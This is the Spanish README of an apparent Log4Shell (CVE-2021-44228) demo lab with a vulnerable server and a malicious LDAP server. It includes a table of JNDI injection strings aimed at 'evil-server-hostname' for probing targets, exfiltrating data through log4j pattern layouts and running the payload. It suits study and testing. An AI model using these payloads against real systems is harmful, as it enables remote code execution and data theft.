
Una demo de la vulnerabilidad Log4Shell (CVE-2021-44228).
Una demo de la vulnerabilidad Log4Shell (CVE-2021-44228).
El servidor web vulnerable y el servidor LDAP malicioso fueron compilados y probados en JDK 1.8.0_181.
goodguys, ejecute gradlew bootJarjava -jar build/libs/goodguys-0.0.1-SNAPSHOT.jarbadguys, ejecute mvn packagejava -jar .\target\evil-server.jarNota: Windows Defender puede mover silenciosamente
target\classes\Exploit.classa la cuarentena.
Los comandos maliciosos están definidos dentro de Exploit.java.
| Entrada | Observaciones |
|---|---|
${jndi:ldap://evil-server-hostname:389/Recon} | Comprueba si el objetivo es vulnerable escuchando una solicitud de conexión al servidor LDAP. |
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)] | Agregue cualquier layout de patrón log4j válido para recopilar los datos del objetivo y mostrarlos en la terminal del atacante. |
${jndi:ldap://evil-server-hostname:389/Exploit} | Ejecute la carga maliciosa. |